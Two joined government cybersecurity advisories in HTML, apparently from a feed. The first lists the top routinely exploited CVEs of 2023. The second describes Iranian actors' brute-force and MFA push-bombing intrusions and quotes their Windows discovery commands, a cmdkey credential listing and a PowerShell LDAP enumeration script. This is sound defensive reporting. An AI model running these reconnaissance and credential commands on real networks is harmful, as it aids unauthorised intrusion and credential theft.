href="https://nvd.nist.gov/vuln/detail/cve-2022-47966" title="CVE-2022-47966 - Critical">CVE-2022-47966</a><strong>:</strong> This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine. <ul> <li>Allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-27350" title="CVE-2023-27350 - Critical">CVE-2023-27350</a>: This vulnerability affects PaperCut MF/NG. <ul> <li>Allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2020-1472">CVE-2020-1472</a>: This vulnerability affects Microsoft Netlogon. <ul> <li>Allows privilege escalation. <ul> <li>An unauthorized user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol.<br><strong>Note</strong>: This CVE has been included in top routinely exploited vulnerabilities lists since 2021.</li> </ul> </li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-42793" title="CVE-2023-42793 - Critical">CVE-2023-42793</a>: This vulnerability can affect JetBrains TeamCity servers. <ul> <li>Allows authentication bypass that allows remote code execution against vulnerable JetBrains TeamCity servers.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-23397" title="CVE-2023-23397 - Critical">CVE-2023-23397</a>: This vulnerability affects Microsoft Office Outlook. <ul> <li>Allows elevation of privilege. <ul> <li>A threat actor can send a specially crafted email that the Outlook client will automatically trigger when Outlook processes it.</li> <li>This exploit occurs even without user interaction.</li> </ul> </li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-49103" title="CVE-2023-49103 - Critical">CVE-2023-49103</a>: This vulnerability affects ownCloud graphapi. <ul> <li>Allows unauthenticated information disclosure. <ul> <li>An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys.</li> </ul> </li> </ul> </li> </ul> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 1: Top 15 Routinely Exploited Vulnerabilities in 2023</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">CVE</th> <th role="columnheader">Vendor</th> <th role="columnheader">Product(s)</th> <th role="columnheader">Vulnerability Type</th> <th role="columnheader">CWE</th> </tr> </thead> <tbody> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-3519" title="CVE-2023-3519 - Critical">CVE-2023-3519</a></td> <td>Citrix</td> <td> <p>NetScaler ADC&nbsp;</p> <p>NetScaler Gateway</p> </td> <td>Code Injection</td> <td><a href="https://cwe.mitre.org/data/definitions/94.html" title="CWE-94: Improper Control of Generation of Code ('Code Injection')">CWE-94: Improper Control of Generation of Code ('Code Injection')</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-4966" title="CVE-2023-4966 - Critical">CVE-2023-4966</a></td> <td>Citrix</td> <td> <p>NetScaler ADC&nbsp;</p> <p>NetScaler Gateway</p> </td> <td>Buffer Overflow</td> <td><a href="https://cwe.mitre.org/data/definitions/119.html" title="CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer">CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" title="CVE-2023-20198 - Critical">CVE-2023-20198</a></td> <td>Cisco</td> <td>IOS XE Web UI</td> <td>Privilege Escalation</td> <td><a href="https://cwe.mitre.org/data/definitions/420.html" title="CWE-420: Unprotected Alternate Channel">CWE-420: Unprotected Alternate Channel</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" title="CVE-2023-20273 - High">CVE-2023-20273</a></td> <td>Cisco</td> <td>IOS XE</td> <td>Web UI Command Injection</td> <td><a href="https://cwe.mitre.org/data/definitions/78.html" title="CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')">CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-27997" title="CVE-2023-27997 - Critical">CVE-2023-27997</a></td> <td>Fortinet</td> <td> <p>FortiOS&nbsp;</p> <p>FortiProxy SSL-VPN</p> </td> <td>Heap-Based Buffer Overflow</td> <td> <p><a href="https://cwe.mitre.org/data/definitions/787.html" title="CWE-787: Out-of-bounds Write">CWE-787: Out-of-bounds Write</a></p> <p><a href="https://cwe.mitre.org/data/definitions/122.html" title="CWE-122: Heap-based Buffer Overflow">CWE-122: Heap-based Buffer Overflow</a></p> </td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-34362" title="CVE-2023-34362 - Critical">CVE-2023-34362</a></td> <td>Progress</td> <td>MOVEit Transfer</td> <td>SQL Injection</td> <td><a href="https://cwe.mitre.org/data/definitions/89.html" title="CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-22515" title="CVE-2023-22515 - Critical">CVE-2023-22515</a></td> <td>Atlassian</td> <td>Confluence Data Center and Server</td> <td>Broken Access Control</td> <td><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20 Improper Input Validation</a></td> </tr> <tr> <td> <p><a href="https://www.cve.org/CVERecord?id=CVE-2021-44228" title="CVE-2021-44228 - Critical">CVE-2021- 44228</a></p> <p>(Log4Shell)</p> </td> <td>Apache</td> <td>Log4j2</td> <td>Remote Code Execution (RCE)</td> <td> <p><a href="https://cwe.mitre.org/data/definitions/917.html" title="CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')">CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')</a></p> <p><a href="https://cwe.mitre.org/data/definitions/502.html" title="CWE-502: Deserialization of Untrusted Data">CWE-502: Deserialization of Untrusted Data</a></p> <p><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20 Improper Input Validation</a></p> <p><a href="https://cwe.mitre.org/data/definitions/400.html" title="CWE-400: Uncontrolled Resource Consumption">CWE-400 Uncontrolled Resource Consumption</a></p> </td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-2868" title="CVE-2023-2868 - Critical">CVE-2023-2868</a></td> <td>Barracuda Networks</td> <td>ESG Appliance</td> <td>Improper Input Validation</td> <td> <p><a href="https://cwe.mitre.org/data/definitions/77.html" title="CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')">CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')</a></p> <p><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20: Improper Input Validation</a></p> </td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2022-47966" title="CVE-2022-47966 - Critical">CVE-2022-47966</a></td> <td>Zoho</td> <td>ManageEngine Multiple Products</td> <td>Remote Code Execution</td> <td><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20 Improper Input Validation</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-27350" title="CVE-2023-27350 - Critical">CVE-2023-27350</a></td> <td>PaperCut</td> <td>MF/NG</td> <td>Improper Access Control</td> <td><a href="https://cwe.mitre.org/data/definitions/284.html" title="CWE-284: Improper Access Control">CWE-284: Improper Access Control</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2020-1472" title="CVE-2020-1472 - Medium">CVE-2020-1472</a></td> <td>Microsoft</td> <td>Netlogon</td> <td>Privilege Escalation</td> <td><a href="https://cwe.mitre.org/data/definitions/330.html" title="CWE-330: Use of Insufficiently Random Values">CWE-330: Use of Insufficiently Random Values</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-42793" title="CVE-2023-42793 - Critical">CVE-2023-42793</a></td> <td>JetBrains</td> <td>TeamCity</td> <td>Authentication Bypass</td> <td><a href="https://cwe.mitre.org/data/definitions/288.html" title="CWE-288: Authentication Bypass Using an Alternate Path or Channel">CWE-288: Authentication Bypass Using an Alternate Path or Channel</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-23397" title="CVE-2023-23397 - Critical">CVE-2023-23397</a></td> <td>Microsoft</td> <td>Office Outlook</td> <td>Privilege Escalation</td> <td> <p><a href="https://cwe.mitre.org/data/definitions/294.html" title="CWE-294: Authentication Bypass by Capture-replay">CWE-294: Authentication Bypass by Capture-replay</a></p> <p><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20: Improper Input Validation</a></p> </td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-49103" title="CVE-2023-49103 - Critical">CVE-2023-49103</a></td> <td>ownCloud</td> <td>graphapi</td> <td>Information Disclosure</td> <td><a href="https://cwe.mitre.org/data/definitions/200.html" title="CWE-200: Exposure of Sensitive Information to an Unauthorized Actor">CWE-200 Exposure of Sensitive Information to an Unauthorized Actor</a></td> </tr> </tbody> </table> <div> <div class="WordSection1"> <h3>Additional Routinely Exploited Vulnerabilities</h3> <p>The authoring agencies identified other vulnerabilities, listed in <strong>Table 2</strong>, that malicious cyber actors also routinely exploited in 2023—in addition to the 15 vulnerabilities listed in <strong>Table 1</strong>.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;2: Additional Routinely Exploited Vulnerabilities in 2023</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">CVE</th> <th role="columnheader">Vendor</th> <th role="columnheader">Product</th> <th role="columnheader">Vulnerability Type</th> <th role="columnheader">CWE</th> </tr> </thead> <tbody> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-22518">CVE-2023-22518</a></td> <td>Atlassian&nbsp;</td> <td>Confluence Data Center and Server&nbsp;</td> <td>Improper Authorization</td> <td><a href="https://cwe.mitre.org/data/definitions/863.html">CWE-863: Incorrect Authorization</a></td> </tr> <tr> <td><a href="https://www.cve.org/CVERecord?id=CVE-2023-29492">CVE-2023- 29492</a></td> <td>Novi</td> <td>Novi Survey</td> <td>Insecure Deserialization</td> <td><a href="https://cwe.mit Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-290a US-CERT Alerts urn:uuid:0c140c03-f8c6-f32a-3df3-14ccfcafc407 Mon, 30 Sep 2024 16:28:59 +0000 <h2><strong>Summary</strong></h2> <p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors. The actors likely aim to obtain credentials and information describing the victim’s network that can then be sold to enable access to cybercriminals.</p> <p>Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access. The authoring agencies assess the Iranian actors sell this information on cybercriminal forums to actors who may use the information to conduct additional malicious activity.</p> <p>This advisory provides the actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). The information is derived from FBI engagements with entities impacted by this malicious activity.</p> <p>The authoring agencies recommend critical infrastructure organizations follow the guidance provided in the <strong>Mitigations</strong> section. At a minimum, organizations should ensure all accounts use strong passwords and register a second form of authentication.</p> <p>Download the PDF version of this report:</p> <p>For a downloadable list of IOCs, see:</p> <p>&nbsp;</p> <h2><strong>Technical Details</strong></h2> <p><strong>Note:&nbsp;</strong>This advisory uses the&nbsp;<a href="https://attack.mitre.org/versions/v15/matrices/enterprise/">MITRE ATT&amp;CK<sup>®</sup></a><a href="https://attack.mitre.org/versions/v15/matrices/enterprise/" title="Enterprise Matrix"> for Enterprise</a> framework, version 15. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section in <strong>Appendix A</strong> for a table of the actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3><strong>Overview of Activity</strong></h3> <p>The actors likely conduct reconnaissance operations to gather victim identity [<a href="https://attack.mitre.org/techniques/T1589/" title="Gather Victim Identity Information">T1589</a>] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [<a href="https://attack.mitre.org/versions/v15/techniques/T1110/" title="Brute Force">T1110</a>]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity’s systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation.</p> <h3><strong>Initial Access and Persistence</strong></h3> <p>The actors use valid user and group email accounts [<a href="https://attack.mitre.org/techniques/T1078/" title="Valid Accounts">T1078</a>], frequently obtained via brute force such as password spraying [<a href="https://attack.mitre.org/versions/v15/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a>] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [<a href="https://attack.mitre.org/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a>], and Citrix systems [<a href="https://attack.mitre.org/techniques/T1133/" title="External Remote Services">T1133</a>]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique—bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications— is known as “MFA fatigue” or “push bombing” [<a href="https://attack.mitre.org/techniques/T1621/" title="Multi-Factor Authentication Request Generation">T1621</a>].</p> <p>Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account:</p> <ul> <li>In two confirmed compromises, the actors leveraged a compromised user’s open registration for MFA [<a href="https://attack.mitre.org/versions/v15/techniques/T1556/006/" title="Modify Authentication Process: Multi-Factor Authentication">T1556.006</a>] to register the actor’s own device [<a href="https://attack.mitre.org/versions/v15/techniques/T1098/005/" title="Account Manipulation: Device Registration">T1098.005</a>] to access the environment.</li> <li>In another confirmed compromise, the actors used a self-service password reset (SSPR) tool associated with a public facing Active Directory Federation Service (ADFS) to reset the accounts with expired passwords [<a href="https://attack.mitre.org/techniques/T1484/002/" title="Domain or Tenant Policy Modification: Trust Modification">T1484.002</a>] and then registered MFA through Okta for compromised accounts without MFA already enabled [<a href="https://attack.mitre.org/versions/v15/techniques/T1556" title="Modify Authentication Process">T1556</a>] [<a href="https://attack.mitre.org/versions/v15/techniques/T1556/006/" title="Modify Authentication Process: Multi-Factor Authentication">T1556.006</a>].</li> </ul> <p>The actors frequently conduct their activity using a virtual private network (VPN) service [<a href="https://attack.mitre.org/techniques/T1572/" title="Protocol Tunneling">T1572</a>]. Several of the IP addresses in the actors’ malicious activity originate from exit nodes tied to the Private Internet Access VPN service.</p> <h3><strong>Lateral Movement</strong></h3> <p>The actors use Remote Desktop Protocol (RDP) for lateral movement&nbsp;[<a href="https://attack.mitre.org/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary&nbsp;<code>mstsc.exe</code> [<a href="https://attack.mitre.org/versions/v15/techniques/T1202" title="Indirect Command Execution">T1202</a><u>]</u>.</p> <h3><strong>Credential Access</strong></h3> <p>The actors likely use open-source tools and methodologies to gather more credentials.&nbsp;The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [<a href="https://attack.mitre.org/versions/v15/techniques/T1558/003/" title="Steal or Forge Kerberos Tickets: Kerberoasting">T1558.003</a>]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [<a href="https://attack.mitre.org/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] <code>DomainPasswordSpray.ps1</code>, which is openly available on GitHub&nbsp;[<a href="https://attack.mitre.org/techniques/T1588/002/" title="Obtain Capabilities: Tool">T1588.002</a>], likely to conduct password spraying. The actors also used the command <code>Cmdkey /list</code>, likely to display usernames and credentials [<a href="https://attack.mitre.org/versions/v15/techniques/T1555/">T1555</a>].</p> <h3><strong>Privilege Escalation</strong></h3> <p>In one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft’s Netlogon (also known as ”Zerologon”) privilege escalation vulnerability (CVE-2020-1472) [<a href="https://attack.mitre.org/versions/v15/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>].</p> <h3><strong>Discovery</strong></h3> <p>The actors leverage&nbsp;living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [<a href="https://attack.mitre.org/versions/v15/techniques/T1018" title="Remote System Discovery">T1018</a>], trusted domains [<a href="https://attack.mitre.org/versions/v15/techniques/T1482" title="Domain Trust Discovery">T1482</a>], lists of domain administrators, and enterprise administrators [<a href="https://attack.mitre.org/versions/v15/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>] [<a href="https://attack.mitre.org/versions/v15/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a>] [<a href="https://attack.mitre.org/versions/v15/techniques/T1069/003/" title="Permission Groups Discovery: Cloud Groups">T1069.003</a>]:</p> <ul> <li><code>Nltest /dclist</code></li> <li><code>Nltest /domain_trusts</code></li> <li><a><code>Nltest /domain_trusts</code></a><code>/all_trusts</code></li> <li><code>Net group “Enterprise admins” /domain</code></li> <li><code>Net group “Domain admins” /domain</code></li> </ul> <p>Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [<a href="https://attack.mitre.org/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>]to search the AD for computer display names, operating systems, descriptions, and distinguished names [<a href="https://attack.mitre.org/techniques/T1082/" title="System Information Discovery">T1082</a>].</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$i=0</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$L='LDAP://' . $D</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$D = [ADSI]$L</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$Date = $((Get-Date).AddDays(-90).ToFileTime())</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$str = '(&amp;(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon&gt;='+$Date+')(lastlogontimestamp&gt;='+$Date+')))'</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s = [adsisearcher]$str</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s.searchRoot = $L.$D.distinguishedName</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s.PropertiesToLoad.Add('cn') &gt; $Null</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s.PropertiesToLoad.Add('operatingsystem') &gt; $Null</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s.PropertiesToLoad.Add('description') &gt; $Null</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$s.PropertiesToLoad.Add('distinguishedName') &gt; $Null</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>Foreach ($CA in $s.FindAll()) {</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>Write-Host $CA.Properties.Item('cn')</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$CA.Properties.Item('operatingsystem')</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$CA. Properties.Item('description')</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$CA.Properties.Item('distinguishedName')</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>$i++</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 